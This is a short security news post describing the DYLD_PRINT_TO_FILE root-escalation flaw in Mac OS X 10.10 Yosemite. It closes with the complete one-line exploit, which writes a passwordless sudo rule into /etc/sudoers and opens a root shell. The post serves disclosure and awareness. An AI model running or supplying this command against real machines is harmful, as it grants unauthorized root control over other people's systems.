Yesterday information was published online through www.theregister.co.uk discussing an exploit that was discovered in the Mac OSX 10.10 Yosemite operating system. The discovered exploit allows a user to gain root access on a machine without any admin credentials. The exploit uses an environment variable called DYLD_PRINT_TO_FILE that was added in the Yosemite operating system, and is used by the OS to specify where the dynamic linker logs error messages. It was discovered however that the environment variable can be used maliciously in order to modify files that are owned by the “root user” account. The bottom line is that with one basic line of code a malware author could easily do away with the password requirement for the user account being compromised, therefore giving them full reign on the system.
While this exploit has not yet been seen implemented into any new malware in the wild, it is important to be aware that such a huge vulnerability exists. As usual, Mac users should always exercise prudence when downloading and installing software onto their machines, as well as download a reliable internet security app. In addition, the exploit is not present in older versions of Mac OSX, such as Mavericks, and is not present on the 10.11 beta of El Capitan.
The vulnerable code is found below
echo ‘echo “$(whoami) ALL=(ALL) NOPASSWD:ALL” >&3’ | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s